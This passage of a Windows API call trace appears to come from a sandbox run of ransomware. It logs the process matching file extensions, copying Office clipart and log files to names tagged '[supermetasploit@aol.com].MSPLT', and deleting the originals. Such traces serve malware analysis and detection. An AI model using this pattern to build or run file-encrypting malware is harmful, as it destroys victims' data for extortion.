returned -1 [0186.556] lstrlenW (lpString=".7z") returned 3 [0186.557] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.557] lstrlenW (lpString=".dbf") returned 4 [0186.557] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.557] lstrlenW (lpString=".1cd") returned 4 [0186.557] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.557] lstrlenW (lpString=".jpg") returned 4 [0186.557] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.557] lstrlenW (lpString=".doc") returned 4 [0186.557] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.557] lstrlenW (lpString=".docx") returned 5 [0186.557] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.557] lstrlenW (lpString=".pdf") returned 4 [0186.557] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.557] lstrlenW (lpString=".xls") returned 4 [0186.557] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.557] lstrlenW (lpString=".xlsx") returned 5 [0186.557] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.557] lstrlenW (lpString=".ppt") returned 4 [0186.557] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.557] lstrlenW (lpString=".zip") returned 4 [0186.557] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.558] lstrlenW (lpString=".rar") returned 4 [0186.558] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.558] lstrlenW (lpString=".bz2") returned 4 [0186.558] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.558] lstrlenW (lpString=".7z") returned 3 [0186.558] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.558] lstrlenW (lpString=".dbf") returned 4 [0186.558] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.558] lstrlenW (lpString=".1cd") returned 4 [0186.558] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.558] lstrlenW (lpString=".jpg") returned 4 [0186.558] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.558] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.558] lstrlenW (lpString="AG00169_.GIF") returned 12 [0186.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.572] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=5375) returned 1 [0186.572] CloseHandle (hObject=0x358) returned 1 [0186.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif")) returned 0x220 [0186.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.572] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.572] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0186.576] GetLastError () returned 0x0 [0186.576] ReadFile (in: hFile=0x358, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x14ff, lpOverlapped=0x0) returned 1 [0186.582] WriteFile (in: hFile=0x2fc, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x1500, lpOverlapped=0x0) returned 1 [0186.583] ReadFile (in: hFile=0x358, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0186.583] WriteFile (in: hFile=0x2fc, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xec, lpOverlapped=0x0) returned 1 [0186.583] SetEndOfFile (hFile=0x2fc) returned 1 [0186.584] CloseHandle (hObject=0x2fc) returned 1 [0186.585] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.585] SetEndOfFile (hFile=0x358) returned 1 [0186.586] CloseHandle (hObject=0x358) returned 1 [0186.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0186.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.587] lstrlenW (lpString=".doc") returned 4 [0186.587] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.587] lstrlenW (lpString=".docx") returned 5 [0186.587] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.587] lstrlenW (lpString=".pdf") returned 4 [0186.587] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.587] lstrlenW (lpString=".xls") returned 4 [0186.587] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.587] lstrlenW (lpString=".xlsx") returned 5 [0186.587] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.587] lstrlenW (lpString=".ppt") returned 4 [0186.587] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.587] lstrlenW (lpString=".zip") returned 4 [0186.587] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.587] lstrlenW (lpString=".rar") returned 4 [0186.587] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.587] lstrlenW (lpString=".bz2") returned 4 [0186.587] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.587] lstrlenW (lpString=".7z") returned 3 [0186.588] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.588] lstrlenW (lpString=".dbf") returned 4 [0186.588] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.588] lstrlenW (lpString=".1cd") returned 4 [0186.588] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.588] lstrlenW (lpString=".jpg") returned 4 [0186.588] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.588] lstrlenW (lpString=".doc") returned 4 [0186.588] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.588] lstrlenW (lpString=".docx") returned 5 [0186.588] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.588] lstrlenW (lpString=".pdf") returned 4 [0186.588] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.588] lstrlenW (lpString=".xls") returned 4 [0186.588] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.588] lstrlenW (lpString=".xlsx") returned 5 [0186.588] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.588] lstrlenW (lpString=".ppt") returned 4 [0186.588] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.588] lstrlenW (lpString=".zip") returned 4 [0186.589] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.589] lstrlenW (lpString=".rar") returned 4 [0186.589] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.589] lstrlenW (lpString=".bz2") returned 4 [0186.589] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.589] lstrlenW (lpString=".7z") returned 3 [0186.589] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.589] lstrlenW (lpString=".dbf") returned 4 [0186.589] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.589] lstrlenW (lpString=".1cd") returned 4 [0186.589] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0186.589] lstrlenW (lpString=".jpg") returned 4 [0186.589] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.589] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.589] lstrlenW (lpString="AG00171_.GIF") returned 12 [0186.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.590] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=5016) returned 1 [0186.590] CloseHandle (hObject=0x358) returned 1 [0186.590] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif")) returned 0x220 [0186.590] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.590] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.590] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0186.591] GetLastError () returned 0x0 [0186.591] ReadFile (in: hFile=0x358, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x1398, lpOverlapped=0x0) returned 1 [0186.615] WriteFile (in: hFile=0x2fc, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x13a0, lpOverlapped=0x0) returned 1 [0186.616] ReadFile (in: hFile=0x358, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0186.616] WriteFile (in: hFile=0x2fc, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xec, lpOverlapped=0x0) returned 1 [0186.616] SetEndOfFile (hFile=0x2fc) returned 1 [0186.622] CloseHandle (hObject=0x2fc) returned 1 [0186.623] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.623] SetEndOfFile (hFile=0x358) returned 1 [0186.624] CloseHandle (hObject=0x358) returned 1 [0186.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0186.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.625] lstrlenW (lpString=".doc") returned 4 [0186.625] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.625] lstrlenW (lpString=".docx") returned 5 [0186.625] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.625] lstrlenW (lpString=".pdf") returned 4 [0186.625] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.625] lstrlenW (lpString=".xls") returned 4 [0186.625] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.625] lstrlenW (lpString=".xlsx") returned 5 [0186.625] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.625] lstrlenW (lpString=".ppt") returned 4 [0186.626] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.626] lstrlenW (lpString=".zip") returned 4 [0186.626] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.626] lstrlenW (lpString=".rar") returned 4 [0186.626] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.626] lstrlenW (lpString=".bz2") returned 4 [0186.626] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.626] lstrlenW (lpString=".7z") returned 3 [0186.626] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.626] lstrlenW (lpString=".dbf") returned 4 [0186.626] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.626] lstrlenW (lpString=".1cd") returned 4 [0186.626] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.626] lstrlenW (lpString=".jpg") returned 4 [0186.626] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.626] lstrlenW (lpString=".doc") returned 4 [0186.626] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.626] lstrlenW (lpString=".docx") returned 5 [0186.626] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.626] lstrlenW (lpString=".pdf") returned 4 [0186.626] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.626] lstrlenW (lpString=".xls") returned 4 [0186.627] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.627] lstrlenW (lpString=".xlsx") returned 5 [0186.627] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.627] lstrlenW (lpString=".ppt") returned 4 [0186.627] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.627] lstrlenW (lpString=".zip") returned 4 [0186.627] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.627] lstrlenW (lpString=".rar") returned 4 [0186.627] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.627] lstrlenW (lpString=".bz2") returned 4 [0186.627] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.627] lstrlenW (lpString=".7z") returned 3 [0186.627] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.627] lstrlenW (lpString=".dbf") returned 4 [0186.627] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.627] lstrlenW (lpString=".1cd") returned 4 [0186.627] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0186.627] lstrlenW (lpString=".jpg") returned 4 [0186.627] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.627] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.628] lstrlenW (lpString="AG00174_.GIF") returned 12 [0186.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0186.630] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=3966) returned 1 [0186.630] CloseHandle (hObject=0x368) returned 1 [0186.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif")) returned 0x220 [0186.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0186.631] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.631] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.631] GetLastError () returned 0x0 [0186.631] ReadFile (hFile=0x368, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0) Thread: id = 10 os_tid = 0x1384 [0164.813] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x7be490 [0164.814] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x7ce498 [0164.814] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ae70 [0164.814] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d090 [0164.814] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76acc0 [0164.815] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x2fc7020 [0164.817] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af30 [0164.818] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af30, Size=0x20) returned 0x74e9a8 [0164.818] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad98 [0164.818] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ad98, Size=0x20) returned 0x74e8e0 [0164.818] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0164.818] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0164.818] Wow64DisableWow64FsRedirection (in: OldValue=0x2aeff50 | out: OldValue=0x2aeff50*=0x0) returned 1 [0164.818] lstrlenW (lpString="kernel32.dll") returned 12 [0164.818] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e9a8 | out: hHeap=0x710000) returned 1 [0164.818] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0164.818] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e8e0 | out: hHeap=0x710000) returned 1 [0164.818] Sleep (dwMilliseconds=0x64) [0166.916] lstrcmpiW (lpString1=".log", lpString2=".MSPLT") returned -1 [0166.917] lstrlenW (lpString="PartnerSetupCompleteResult.log") returned 30 [0166.917] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0167.188] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=40) returned 1 [0167.188] CloseHandle (hObject=0x2d0) returned 1 [0167.188] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log")) returned 0x20 [0167.189] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0167.189] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0167.189] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0167.189] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0167.189] CreateFileW 